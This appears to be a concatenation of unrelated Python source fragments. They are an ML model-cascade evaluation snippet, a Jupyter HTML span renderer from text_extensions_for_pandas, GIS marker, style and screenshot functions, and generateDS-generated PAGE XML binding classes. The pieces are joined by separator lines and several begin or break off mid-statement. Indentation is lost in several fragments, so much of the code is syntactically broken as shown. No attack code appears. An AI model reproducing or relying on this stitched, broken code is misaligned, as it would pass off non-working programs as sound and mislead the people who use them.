print("Number of Tests (2nd Round): ", method_tests_Round_2, "\t Computation: {:.1f} TMACs".format(method_TeraMACs_Round_2))
##################################
# Finish Round-2. Comes Round-3.
##################################
K0_score, K0_target = load_validate_dump(pkl_dir=pkl_dir, pkl_name="ResNeXt101FullK0.pkl", verbose=False)
method_recall = 100 * np.sum( np.logical_and(
np.logical_and(K0_target, K0_score>0.5),
method_Round_2_next) ) / np.sum(K0_target==1) # use K0 model as the second round
method_FPR = 100 * np.sum( np.logical_and(
np.logical_and(K0_target==0, K0_score>0.5),
method_Round_2_next)
) / np.sum(K0_target==0) # False Positive Rate
print("Recall(%): {} FPR(%): {:3f}".format(method_recall, method_FPR))
method_tests_Round_3 = np.sum(method_Round_2_next)
each_K0_GigaMACs = 16.5 # 16.5 GMacs per test, same as the baseline model
method_TeraMACs_Round_3 = each_K0_GigaMACs / 1000 * method_tests_Round_3 # TMacs 10^12
print("Number of Tests (3rd Round): ", method_tests_Round_3, "\t Computation: {:.1f} TMACs".format(method_TeraMACs_Round_3))
method_TeraMACs_total = method_TeraMACs_Round_1 + method_TeraMACs_Round_2 + method_TeraMACs_Round_3
method_tests_total = method_tests_Round_1 + method_tests_Round_2 + method_tests_Round_3
print("Total Computation: {:.1f} TeraMACs".format(method_TeraMACs_total), "Total Tests:", method_tests_total, "Relative Cost", method_TeraMACs_total/805.2)
result_dict = {
'method_score': method_score, # raw outputs
'method_target': method_target, # raw outputs
'method_recall': method_recall, # performance metrics
'method_FPR': method_FPR, # performance metrics
'method_tests_Round_1': method_tests_Round_1, # computation cost metrics
'method_tests_Round_3': method_tests_Round_3, # computation cost metrics
'method_TeraMACs_Round_1': method_TeraMACs_Round_1, # computation cost metrics
'method_TeraMACs_Round_3': method_TeraMACs_Round_3, # computation cost metrics
'method_TeraMACs_total': method_TeraMACs_total, # computation cost metrics
}
return result_dict
K7G2_A2_result_dict = algorithm_2_wrapper(
| |
#
# Copyright (c) 2021 IBM Corp.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# span.py
#
# Part of text_extensions_for_pandas
#
# Support for span-centric Jupyter rendering and utilities
#
import textwrap
from typing import *
from enum import Enum
import text_extensions_for_pandas.resources
# TODO: This try/except block is for Python 3.6 support, and should be
# reduced to just importing importlib.resources when 3.6 support is dropped.
try:
import importlib.resources as pkg_resources
except ImportError:
import importlib_resources as pkg_resources
# Limits the max number of documents rendered by pretty_print_html / the
# static HTML fallback. Matches Pandas' default display.max_seq_items.
_DOCUMENT_DISPLAY_LIMIT = 100
class SetType(Enum):
    """How a later span relates to an earlier span covering the same text.

    NESTED: the later span is fully contained in the earlier one.
    OVERLAP: the spans partially overlap.
    """

    NESTED = 1
    OVERLAP = 2
class RegionType(Enum):
    """Region categories: NESTED, COMPLEX, SOLO.

    NOTE(review): not referenced in the visible part of this module —
    presumably consumed by the rendering script; confirm before removing.
    """

    NESTED = 1
    COMPLEX = 2
    SOLO = 3
def pretty_print_html(column: Union["SpanArray", "TokenSpanArray"],
                      show_offsets: bool) -> str:
    """
    HTML pretty-printing of a series of spans for Jupyter notebooks.

    Args:
        column: Span column (either character or token spans).
        show_offsets: True to generate a table of span offsets in addition
            to the marked-up text

    Returns:
        An HTML fragment containing a static rendering of the spans plus a
        script that upgrades it to an interactive widget when JavaScript is
        available. At most ``_DOCUMENT_DISPLAY_LIMIT`` documents are shown.
    """
    # Local import to prevent circular dependencies
    from text_extensions_for_pandas.array.span import SpanArray
    from text_extensions_for_pandas.array.token_span import TokenSpanArray
    if not isinstance(column, (SpanArray, TokenSpanArray)):
        raise TypeError(f"Expected SpanArray or TokenSpanArray, but received "
                        f"{column} of type {type(column)}")

    # Gets the main script and stylesheet from the 'resources' sub-package
    style_text: str = pkg_resources.read_text(text_extensions_for_pandas.resources, "span_array.css")
    script_text: str = pkg_resources.read_text(text_extensions_for_pandas.resources, "span_array.js")

    # Declare initial variables common to all render calls
    instance_init_script_list: List[str] = []

    # For each document, pass the array of spans and document text into the
    # script's render function
    document_columns = column.split_by_document()
    for column_index in range(min(_DOCUMENT_DISPLAY_LIMIT, len(document_columns))):
        # Get a javascript representation of the column: each span becomes a
        # JS two-element array literal [begin, end].
        span_array = []
        token_span_array = []
        for e in document_columns[column_index]:
            span_array.append(f"""[{e.begin},{e.end}]""")
            if hasattr(e, "tokens"):
                token_span_array.append(f"""[{e.begin_token},{e.end_token}]""")

        # Document text is escaped for a single-quoted JS string literal.
        document_object_script = f"""
            const doc_spans = [{','.join(span_array)}]
            const doc_text = '{_get_escaped_doctext(document_columns[column_index])}'
        """

        # If the documents are a TokenSpanArray, include the start and end
        # token indices in the document object.
        if len(token_span_array) > 0:
            document_object_script += f"""
                const doc_token_spans = [{','.join(token_span_array)}]
                documents.push({{doc_text: doc_text, doc_spans: doc_spans, doc_token_spans: doc_token_spans}})
            """
        else:
            document_object_script += """
                documents.push({doc_text: doc_text, doc_spans: doc_spans})
            """

        instance_init_script_list.append(f"""
            {{
                {document_object_script}
            }}
        """)

    # Defines a list of DOM strings to be appended to the end of the returned HTML.
    postfix_tags: List[str] = []

    if len(document_columns) > _DOCUMENT_DISPLAY_LIMIT:
        postfix_tags.append(f"""
            <footer>Documents truncated. Showing {_DOCUMENT_DISPLAY_LIMIT} of {len(document_columns)}</footer>
        """)

    # Get the show_offsets parameter as a JavaScript boolean
    show_offset_string = 'true' if show_offsets else 'false'

    # The static HTML from _get_initial_static_html is the no-JavaScript
    # fallback; the trailing script replaces it with the interactive widget.
    return textwrap.dedent(f"""
        <style class="span-array-css">
            {textwrap.indent(style_text, ' ')}
        </style>
        <script>
        {{
            {textwrap.indent(script_text, ' ')}
        }}
        </script>
        <div class="span-array">
            {_get_initial_static_html(column, show_offsets)}
            <span style="font-size: 0.8em;color: #b3b3b3;">Your notebook viewer does not support Javascript execution. The above rendering will not be interactive.</span>
        </div>
        <script>
        {{
            const Span = window.SpanArray.Span
            const script_context = document.currentScript
            const documents = []
            {''.join(instance_init_script_list)}
            const instance = new window.SpanArray.SpanArray(documents, {show_offset_string}, script_context)
            instance.render()
        }}
        </script>
        {''.join(postfix_tags)}
    """)
def _get_escaped_doctext(column: Union["SpanArray", "TokenSpanArray"]) -> List[str]:
# Subroutine of pretty_print_html() above.
# Should only be called for single-document span arrays.
if not column.is_single_document:
raise ValueError("Array contains spans from multiple documents. Can only "
"render one document at a time.")
text = column.document_text
text_pieces = []
for i in range(len(text)):
if text[i] == "'":
text_pieces.append("\\'")
elif text[i] == "\n":
text_pieces.append("\\n")
else:
text_pieces.append(text[i])
return "".join(text_pieces)
def _get_initial_static_html(column: Union["SpanArray", "TokenSpanArray"],
                             show_offsets: bool) -> str:
    """
    Subroutine of pretty_print_html above.

    Gets the initial static HTML representation of the column for notebook
    viewers without JavaScript support. Iterates over each document and
    constructs the DOM string with template literals.

    ! Text inserted into the DOM as raw HTML should always be sanitized to
    prevent unintended DOM manipulation and XSS attacks.

    :param column: Span array to render (may cover multiple documents).
    :param show_offsets: NOTE(review): accepted but never read here — the
     static table always shows offsets. Confirm whether it should be honored.
    :returns: DOM string for up to ``_DOCUMENT_DISPLAY_LIMIT`` documents.
    """
    documents = column.split_by_document()
    documents_html = []
    for column_index in range(min(_DOCUMENT_DISPLAY_LIMIT, len(documents))):
        document = documents[column_index]
        # Generate a dictionary to store span information, including
        # relationships with spans occupying the same region.
        spans = {}
        is_token_document = False
        sorted_span_ids = []
        for i in range(len(document)):
            span_data = {}
            span_data["id"] = i
            span_data["begin"] = document[i].begin
            span_data["end"] = document[i].end
            if hasattr(document[i], "tokens"):
                is_token_document = True
                span_data["begin_token"] = document[i].begin_token
                span_data["end_token"] = document[i].end_token
            span_data["sets"] = []
            spans[i] = span_data
            sorted_span_ids.append(i)
        # Sort IDs by begin offset ascending, then end offset descending, so
        # a span always precedes any span it contains.
        sorted_span_ids.sort(key=lambda id: (spans[id]["begin"], -spans[id]["end"]))
        for i in range(len(sorted_span_ids)):
            span_data = spans[sorted_span_ids[i]]
            for j in range(i + 1, len(sorted_span_ids)):
                sub_span_data = spans[sorted_span_ids[j]]
                # If the spans do not overlap, exit the sub-loop
                if sub_span_data["begin"] >= span_data["end"]:
                    break
                elif sub_span_data["end"] <= span_data["end"]:
                    span_data["sets"].append({"type": SetType.NESTED, "id": sub_span_data["id"]})
                else:
                    span_data["sets"].append({"type": SetType.OVERLAP, "id": sub_span_data["id"]})
            spans[sorted_span_ids[i]] = span_data
        # Generate the table rows DOM string from span data.
        table_rows_html = []
        for i in range(len(spans)):
            span = spans[i]
            table_rows_html.append(f"""
            <tr>
                <td><b>{span["id"]}</b></td>
                <td>{span["begin"]}</td>
                <td>{span["end"]}</td>
            """)
            if is_token_document:
                table_rows_html.append(f"""
                <td>{span["begin_token"]}</td>
                <td>{span["end_token"]}</td>
                """)
            table_rows_html.append(f"""
                <td>{_get_sanitized_text(document.document_text[span["begin"]:span["end"]])}</td>
            </tr>
            """)
        # Generate the regions of the document_text to highlight from span data.
        mark_regions = []
        i = 0
        while i < len(document):
            region = {}
            region["root_id"] = i
            region["begin"] = spans[i]["begin"]
            set_span = _get_set_span(spans, i)
            region["end"] = set_span["end"]
            if len(spans[i]["sets"]) > 0:
                # Connected spans: render as a complex or nested set.
                if _is_complex(spans, i):
                    region["type"] = RegionType.COMPLEX
                else:
                    region["type"] = RegionType.NESTED
            else:
                region["type"] = RegionType.SOLO
            mark_regions.append(region)
            # Skip past every span already absorbed into this region.
            i = set_span["highest_id"] + 1
        # Generate the document_text DOM string from the regions created above.
        context_html = []
        if len(mark_regions) == 0:
            # There are no marked regions. Just append the sanitized text.
            context_html.append(_get_sanitized_text(document.document_text))
        else:
            # Iterate over each marked region and construct the HTML for the
            # preceding text and the marked text, then append that HTML to the
            # list of DOM strings for the document_text.
            snippet_begin = 0
            for region in mark_regions:
                context_html.append(f"""
                {_get_sanitized_text(document.document_text[snippet_begin:region["begin"]])}
                """)
                if region["type"] == RegionType.COMPLEX:
                    context_html.append(f"""
                    <span class='mark btn-info complex-set' style='
                        padding:0.4em;
                        border-radius:0.35em;
                        background:linear-gradient(to right, #a0c4ff, #ffadad);
                        color: black;
                    '>{_get_sanitized_text(document.document_text[region["begin"]:region["end"]])}
                        <span class='mark-tag' style='
                            font-weight: bolder;
                            font-size: 0.8em;
                            font-variant: small-caps;
                            font-variant-caps: small-caps;
                            font-variant-caps: all-small-caps;
                            margin-left: 8px;
                            text-transform: uppercase;
                            color: black;
                        '>Set</span>
                    </span>
                    """)
                elif region["type"] == RegionType.NESTED:
                    mark_html = []
                    nested_snippet_begin = region["begin"]
                    # Iterate over each span nested within the root span of
                    # the marked region. ("link" renamed from "set" to avoid
                    # shadowing the builtin.)
                    for nested_span in map(lambda link: spans[link["id"]],
                                           spans[region["root_id"]]["sets"]):
                        mark_html.append(f"""
                        {_get_sanitized_text(document.document_text[nested_snippet_begin:nested_span["begin"]])}
                        <span class='mark btn-warning' style='
                            padding:0.2em 0.4em;
                            border-radius:0.35em;
                            background-color: #ffadad;
                            color: black;
                        '>{_get_sanitized_text(document.document_text[nested_span["begin"]:nested_span["end"]])}</span>
                        """)
                        nested_snippet_begin = nested_span["end"]
                    mark_html.append(_get_sanitized_text(document.document_text[nested_snippet_begin:region["end"]]))
                    context_html.append(f"""
                    <span class='mark btn-primary' style='padding:0.4em;border-radius:0.35em;background-color: #a0c4ff;color:black;'>{"".join(mark_html)}</span>
                    """)
                elif region["type"] == RegionType.SOLO:
                    context_html.append(f"""
                    <span class='mark btn-primary' style='padding:0.4em;border-radius:0.35em;background-color: #a0c4ff;color:black;'>{_get_sanitized_text(document.document_text[region["begin"]:region["end"]])}</span>
                    """)
                snippet_begin = region["end"]
            context_html.append(_get_sanitized_text(document.document_text[snippet_begin:]))
        # Generate the document's DOM string.
        # Fixed: the <thead> previously emitted </tr> without a matching
        # opening <tr>, producing malformed HTML.
        documents_html.append(f"""
        <div class='document'>
            <table style='
                table-layout: auto;
                overflow: hidden;
                width: 100%;
                border-collapse: collapse;
            '>
                <thead style='font-variant-caps: all-petite-caps;'>
                    <tr>
                        <th></th>
                        <th>begin</th>
                        <th>end</th>
                        {"<th>begin token</th><th>end token</th>" if is_token_document else ""}
                        <th style='text-align:right;width:100%'>context</th>
                    </tr>
                </thead>
                <tbody>
                    {"".join(table_rows_html)}
                </tbody>
            </table>
            <p style='
                padding: 1em;
                line-height: calc(var(--jp-content-line-height, 1.6) * 1.6);
            '>
                {"".join(context_html)}
            </p>
        </div>
        """)
    # Concat all documents and return the final DOM string
    return "".join(documents_html)
def _get_set_span(spans: Dict, id: int) -> Dict:
# Subroutine of _get_initial_static_html() above.
# Recursive algorithm to get the last end and ID values of the set of spans connected to span with the given ID
# Will raise a KeyError exception if an invalid key is given
end = spans[id]["end"]
highest_id = id
# For each span in the set of spans, get the return values and track the greatest endpoint index and ID values.
for set in spans[id]["sets"]:
other = _get_set_span(spans, set["id"])
if other["end"] > end:
end = other["end"]
if other["highest_id"] > highest_id:
highest_id = other["highest_id"]
return {"end": end, "highest_id": highest_id}
def _is_complex(spans: Dict, id: int) -> bool:
# Subroutine of _get_initial_static_html() above.
# Returns True if the provided span should be considered a "Complex" span. Implementation details below.
# Will raise a KeyError exception if an invalid key is given
# If any connection sets are of type:overlap or nested beyond a depth of 1, return True
for set in spans[id]["sets"]:
if set["type"] == SetType.OVERLAP:
return True
elif set["type"] == SetType.NESTED:
if | |
# if layer_id:
# layer_name = db(ftable.id == layer_id).select(ftable.name,
# limitby = (0, 1)
# ).first().name
# else:
# layer_name = "Unknown"
# _debug("Attributes lookup of layer %s completed in %s seconds",
# layer_name,
# duration,
# )
_markers = get_vars.get("markers", None)
if _markers:
# Add a per-feature Marker
marker_fn = s3db.get_config(tablename, "marker_fn")
if marker_fn:
m = {}
for record in resource:
m[record[pkey]] = marker_fn(record)
else:
# No configuration found so use default marker for all
c, f = tablename.split("_", 1)
m = GIS.get_marker(c, f)
markers[tablename] = m
if individual:
# Add a per-feature Style
# Optionally restrict to a specific Config?
#config = GIS.get_config()
stable = s3db.gis_style
query = (stable.deleted == False) & \
(stable.layer_id == layer_id) & \
(stable.record_id.belongs(resource._ids))
#((stable.config_id == config.id) |
# (stable.config_id == None))
rows = db(query).select(stable.record_id,
stable.style)
for row in rows:
styles[row.record_id] = json.dumps(row.style, separators=JSONSEPARATORS)
styles[tablename] = styles
else:
# KML, GeoRSS or GPX
marker_fn = s3db.get_config(tablename, "marker_fn")
if marker_fn:
# Add a per-feature Marker
for record in resource:
markers[record[pkey]] = marker_fn(record)
else:
# No configuration found so use default marker for all
c, f = tablename.split("_", 1)
markers = GIS.get_marker(c, f)
markers[tablename] = markers
# Lookup the LatLons now so that it can be done as a single
# query rather than per record
#if DEBUG:
# start = datetime.datetime.now()
latlons = {}
#wkts = {}
geojsons = {}
gtable = s3db.gis_location
if trackable:
# Use S3Track
ids = resource._ids
# Ensure IDs in ascending order
ids.sort()
try:
tracker = S3Trackable(table, record_ids=ids)
except SyntaxError:
# This table isn't trackable
pass
else:
_latlons = tracker.get_location(_fields=[gtable.lat,
gtable.lon],
empty = False,
)
index = 0
for _id in ids:
_location = _latlons[index]
latlons[_id] = (_location.lat, _location.lon)
index += 1
if not latlons:
join = True
#custom = False
if "location_id" in table.fields:
query = (table.id.belongs(resource._ids)) & \
(table.location_id == gtable.id)
elif "site_id" in table.fields:
stable = s3db.org_site
query = (table.id.belongs(resource._ids)) & \
(table.site_id == stable.site_id) & \
(stable.location_id == gtable.id)
elif tablename == "gis_location":
join = False
query = (table.id.belongs(resource._ids))
else:
# Look at the Context
context = resource.get_config("context")
if context:
location_context = context.get("location")
else:
location_context = None
if not location_context:
# Can't display this resource on the Map
return None
# @ToDo: Proper system rather than this hack_which_works_for_current_usecase
# Resolve selector (which automatically attaches any required component)
rfield = resource.resolve_selector(location_context)
if "." in location_context:
# Component
alias, cfield = location_context.split(".", 1)
try:
component = resource.components[alias]
except KeyError:
# Invalid alias
# Can't display this resource on the Map
return None
ctablename = component.tablename
ctable = s3db[ctablename]
query = (table.id.belongs(resource._ids)) & \
rfield.join[ctablename] & \
(ctable[cfield] == gtable.id)
#custom = True
# @ToDo:
#elif "$" in location_context:
else:
# Can't display this resource on the Map
return None
if geojson and not points:
geojsons[tablename] = GIS.get_locations(table, query, join, geojson)
# @ToDo: Support Polygons in KML, GPX & GeoRSS
#else:
# wkts[tablename] = GIS.get_locations(table, query, join, geojson)
else:
# Points
rows = db(query).select(table.id,
gtable.lat,
gtable.lon)
#if custom:
# # Add geoJSONs
#elif join:
if join:
for row in rows:
# @ToDo: Support records with multiple locations
# (e.g. an Org with multiple Facs)
_location = row["gis_location"]
latlons[row[tablename].id] = (_location.lat, _location.lon)
else:
# gis_location: Always single
for row in rows:
latlons[row.id] = (row.lat, row.lon)
_latlons = {}
if latlons:
_latlons[tablename] = latlons
#if DEBUG:
# end = datetime.datetime.now()
# duration = end - start
# duration = "{:.2f}".format(duration.total_seconds())
# _debug("latlons lookup of layer %s completed in %s seconds",
# layer_name,
# duration,
# )
# Used by S3XML's gis_encode()
return {"geojsons": geojsons,
"latlons": _latlons,
#"wkts": wkts,
"attributes": attributes,
"markers": markers,
"styles": styles,
}
# -------------------------------------------------------------------------
@staticmethod
def get_marker(controller=None,
               function=None,
               filter=None,
               ):
    """
    Returns a Marker dict
    - called by xml.gis_encode() for non-geojson resources
    - called by S3Map.widget() if no marker_fn supplied

    @param controller: controller name of the gis_layer_feature to match
    @param function: function name of the gis_layer_feature to match
    @param filter: optional gis_layer_feature.filter value to disambiguate
                   multiple matching layers
    """
    marker = None
    if controller and function:
        # Lookup marker in the gis_style table
        db = current.db
        s3db = current.s3db
        ftable = s3db.gis_layer_feature
        stable = s3db.gis_style
        mtable = s3db.gis_marker
        config = GIS.get_config()
        # Non-aggregate feature layers for this controller/function
        query = (ftable.controller == controller) & \
                (ftable.function == function) & \
                (ftable.aggregate == False)
        # Left-join layer-wide styles (record_id == None) for the current
        # config or the global config, and their marker
        left = (stable.on((stable.layer_id == ftable.layer_id) & \
                          (stable.record_id == None) & \
                          ((stable.config_id == config.id) | \
                           (stable.config_id == None))),
                mtable.on(mtable.id == stable.marker_id),
                )
        if filter:
            query &= (ftable.filter == filter)
        # Sort so that a config-specific style comes before the global
        # (config_id == None) one; NULL sort order differs per database
        if current.deployment_settings.get_database_type() == "postgres":
            # None is last
            orderby = stable.config_id
        else:
            # None is 1st
            orderby = ~stable.config_id
        layers = db(query).select(mtable.image,
                                  mtable.height,
                                  mtable.width,
                                  ftable.style_default,
                                  stable.gps_marker,
                                  left=left,
                                  orderby=orderby)
        if len(layers) > 1:
            # Multiple matching layers: keep only the one flagged as the
            # style default
            layers.exclude(lambda row: row["gis_layer_feature.style_default"] == False)
        if len(layers) == 1:
            layer = layers.first()
        else:
            # Can't differentiate
            layer = None
        if layer:
            _marker = layer["gis_marker"]
            if _marker.image:
                marker = {"image": _marker.image,
                          "height": _marker.height,
                          "width": _marker.width,
                          "gps_marker": layer["gis_style"].gps_marker,
                          }
    if not marker:
        # Default
        from .marker import Marker
        marker = Marker().as_dict()
    return marker
# -------------------------------------------------------------------------
@staticmethod
def get_style(layer_id=None,
              aggregate=None,
              ):
    """
    Returns a Style dict
    - called by S3Report.geojson()
    """
    from .style import Style
    if layer_id:
        # Layer-specific style, when one is configured
        layer_style = Style(layer_id=layer_id,
                            aggregate=aggregate).as_dict()
        if layer_style:
            return layer_style
    # Default
    return Style().as_dict()
# -------------------------------------------------------------------------
@staticmethod
def get_screenshot(config_id, temp=True, height=None, width=None):
"""
Save a Screenshot of a saved map
@requires:
PhantomJS http://phantomjs.org
Selenium https://pypi.python.org/pypi/selenium
"""
# @ToDo: allow selection of map_id
map_id = "default_map"
#from selenium import webdriver
# We include a Custom version which is patched to access native PhantomJS functions from:
# https://github.com/watsonmw/ghostdriver/commit/d9b65ed014ed9ff8a5e852cc40e59a0fd66d0cf1
from webdriver import WebDriver
from selenium.common.exceptions import TimeoutException, WebDriverException
from selenium.webdriver.support.ui import WebDriverWait
request = current.request
cachepath = os.path.join(request.folder, "static", "cache", "jpg")
if not os.path.exists(cachepath):
try:
os.mkdir(cachepath)
except OSError as os_error:
error = "GIS: JPEG files cannot be saved: %s %s" % \
(cachepath, os_error)
current.log.error(error)
current.session.error = error
redirect(URL(c="gis", f="index", vars={"config": config_id}))
# Copy the current working directory to revert back to later
cwd = os.getcwd()
# Change to the Cache folder (can't render directly there from execute_phantomjs)
os.chdir(cachepath)
#driver = webdriver.PhantomJS()
# Disable Proxy for Win32 Network Latency issue
driver = WebDriver(service_args=["--proxy-type=none"])
# Change back for other parts
os.chdir(cwd)
settings = current.deployment_settings
if height is None:
# Set the size of the browser to match the map
height = settings.get_gis_map_height()
if width is None:
width = settings.get_gis_map_width()
# For Screenshots
#height = 410
#width = 820
driver.set_window_size(width + 5, height + 20)
# Load the homepage
# (Cookie needs to be set on same domain as it takes effect)
base_url = "%s/%s" % (settings.get_base_public_url(),
request.application)
driver.get(base_url)
response = current.response
session_id = response.session_id
if not current.auth.override:
# Reuse current session to allow access to ACL-controlled resources
driver.add_cookie({"name": response.session_id_name,
"value": session_id,
"path": "/",
})
# For sync connections
current.session._unlock(response)
# Load the map
url = "%s/gis/map_viewing_client?print=1&config=%s" % (base_url,
config_id)
driver.get(url)
# Wait for map to load (including it's layers)
# Alternative approach: https://raw.githubusercontent.com/ariya/phantomjs/master/examples/waitfor.js
def map_loaded(driver):
test = '''return S3.gis.maps['%s'].s3.loaded''' % map_id
try:
result = driver.execute_script(test)
except WebDriverException:
result = False
return result
try:
# Wait for up to 100s (large screenshots take a long time for layers to load)
WebDriverWait(driver, 100).until(map_loaded)
except TimeoutException as e:
driver.quit()
current.log.error("Timeout: %s" % e)
return None
# Save the Output
# @ToDo: Can we use StringIO instead of cluttering filesystem?
# @ToDo: Allow option of PDF (as well as JPG)
# https://github.com/ariya/phantomjs/blob/master/examples/rasterize.js
if temp:
filename = "%s.jpg" % session_id
else:
filename = "config_%s.jpg" % config_id
# Cannot control file size (no access to clipRect) or file format
#driver.save_screenshot(os.path.join(cachepath, filename))
#driver.page.clipRect = {"top": 10,
# "left": 5,
# "width": width,
# "height": height
# }
#driver.page.render(filename, {"format": "jpeg", "quality": "100"})
script = '''
var page = this;
page.clipRect = {top: 10,
left: 5,
width: %(width)s,
height: %(height)s
};
page.render('%(filename)s', {format: 'jpeg', quality: '100'});''' % \
{"width": width,
"height": height,
"filename": filename,
}
try:
result = driver.execute_phantomjs(script)
except WebDriverException as e:
driver.quit()
current.log.error("WebDriver crashed: %s" % e)
return None
driver.quit()
if temp:
# This was a temporary config for creating the screenshot, | |
the paper of a printed page. Its size
is equal for all pages of a book (exceptions: titlepage, multipage
pictures).
It contains all living elements (except marginals) like body type,
footnotes, headings, running titles.
It does not contain pagenumber (if not part of running title), marginals,
signature mark, preview words."""
__hash__ = GeneratedsSuper.__hash__
subclass = None
superclass = None
def __init__(self, Coords=None, gds_collector_=None, **kwargs_):
    # Collector for parse-time messages (generateDS convention).
    self.gds_collector_ = gds_collector_
    # Original etree node, kept only when SaveElementTreeNode is enabled.
    self.gds_elementtree_node_ = None
    # Tag name actually seen in the XML (may differ from the class name).
    self.original_tagname_ = None
    self.parent_object_ = kwargs_.get('parent_object_')
    # Captured namespace prefix of this element.
    self.ns_prefix_ = None
    # Coords child element (built as a CoordsType in buildChildren()).
    self.Coords = Coords
    self.Coords_nsprefix_ = None
def factory(*args_, **kwargs_):
    # Instantiate a registered override when a subclass module is active,
    # then the class-level 'subclass' hook, else PrintSpaceType itself.
    if CurrentSubclassModule_ is not None:
        subclass = getSubclassFromModule_(
            CurrentSubclassModule_, PrintSpaceType)
        if subclass is not None:
            return subclass(*args_, **kwargs_)
    if PrintSpaceType.subclass:
        return PrintSpaceType.subclass(*args_, **kwargs_)
    else:
        return PrintSpaceType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
    # Accessor for the captured namespace prefix.
    return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
    # Mutator for the captured namespace prefix.
    self.ns_prefix_ = ns_prefix
def get_Coords(self):
    # Accessor for the Coords child element.
    return self.Coords
def set_Coords(self, Coords):
    # Mutator for the Coords child element.
    self.Coords = Coords
def hasContent_(self):
if (
self.Coords is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2010-03-19"', name_='PrintSpaceType', pretty_print=True):
    # Serialize this element (and its children) as XML to outfile at the
    # given indentation level.
    imported_ns_def_ = GenerateDSNamespaceDefs_.get('PrintSpaceType')
    if imported_ns_def_ is not None:
        # An externally registered namespace definition takes precedence.
        namespacedef_ = imported_ns_def_
    if pretty_print:
        eol_ = '\n'
    else:
        eol_ = ''
    if self.original_tagname_ is not None and name_ == 'PrintSpaceType':
        # Re-emit under the tag name originally parsed from the document.
        name_ = self.original_tagname_
    if UseCapturedNS_ and self.ns_prefix_:
        namespaceprefix_ = self.ns_prefix_ + ':'
    showIndent(outfile, level, pretty_print)
    outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
    already_processed = set()
    self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='PrintSpaceType')
    if self.hasContent_():
        outfile.write('>%s' % (eol_, ))
        self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='PrintSpaceType', pretty_print=pretty_print)
        showIndent(outfile, level, pretty_print)
        outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
    else:
        # No child content: emit a self-closing tag.
        outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='PrintSpaceType'):
    # PrintSpaceType defines no XML attributes.
    pass
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2010-03-19"', name_='PrintSpaceType', fromsubclass_=False, pretty_print=True):
    # Serialize the Coords child element, if present.
    if pretty_print:
        eol_ = '\n'
    else:
        eol_ = ''
    if self.Coords is not None:
        # Use the child's captured prefix when namespace capture is enabled.
        namespaceprefix_ = self.Coords_nsprefix_ + ':' if (UseCapturedNS_ and self.Coords_nsprefix_) else ''
        self.Coords.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Coords', pretty_print=pretty_print)
def build(self, node, gds_collector_=None):
    # Populate this object from an ElementTree node; returns self.
    self.gds_collector_ = gds_collector_
    if SaveElementTreeNode:
        self.gds_elementtree_node_ = node
    already_processed = set()
    self.ns_prefix_ = node.prefix
    self.buildAttributes(node, node.attrib, already_processed)
    for child in node:
        # Strip the namespace URI from the tag to get the local name.
        nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
        self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
    return self
def buildAttributes(self, node, attrs, already_processed):
    # PrintSpaceType defines no XML attributes.
    pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
    # Build the Coords child element from its XML node.
    if nodeName_ == 'Coords':
        obj_ = CoordsType.factory(parent_object_=self)
        obj_.build(child_, gds_collector_=gds_collector_)
        self.Coords = obj_
        obj_.original_tagname_ = 'Coords'
# end class PrintSpaceType
class ReadingOrderType(GeneratedsSuper):
    """Definition of the reading order within the page. To express a reading
    order between elements they have to be included in an OrderedGroup.
    Groups may contain further groups."""
    __hash__ = GeneratedsSuper.__hash__
    # Assign a class here to have factory() build that subclass instead.
    subclass = None
    superclass = None
    def __init__(self, OrderedGroup=None, UnorderedGroup=None, gds_collector_=None, **kwargs_):
        # Collector for parse-time messages (generateDS convention).
        self.gds_collector_ = gds_collector_
        self.gds_elementtree_node_ = None
        self.original_tagname_ = None
        self.parent_object_ = kwargs_.get('parent_object_')
        self.ns_prefix_ = None
        # Root group of the reading order; OrderedGroup and UnorderedGroup
        # children are both accepted here.
        self.OrderedGroup = OrderedGroup
        self.OrderedGroup_nsprefix_ = None
        self.UnorderedGroup = UnorderedGroup
        self.UnorderedGroup_nsprefix_ = None
    def factory(*args_, **kwargs_):
        # Instantiate a registered override when a subclass module is active,
        # then the class-level 'subclass' hook, else ReadingOrderType itself.
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, ReadingOrderType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if ReadingOrderType.subclass:
            return ReadingOrderType.subclass(*args_, **kwargs_)
        else:
            return ReadingOrderType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_ns_prefix_(self):
        # Accessor for the captured namespace prefix.
        return self.ns_prefix_
    def set_ns_prefix_(self, ns_prefix):
        # Mutator for the captured namespace prefix.
        self.ns_prefix_ = ns_prefix
    def get_OrderedGroup(self):
        return self.OrderedGroup
    def set_OrderedGroup(self, OrderedGroup):
        self.OrderedGroup = OrderedGroup
    def get_UnorderedGroup(self):
        return self.UnorderedGroup
    def set_UnorderedGroup(self, UnorderedGroup):
        self.UnorderedGroup = UnorderedGroup
    def hasContent_(self):
        # True when there is any child element to serialize.
        if (
            self.OrderedGroup is not None or
            self.UnorderedGroup is not None
        ):
            return True
        else:
            return False
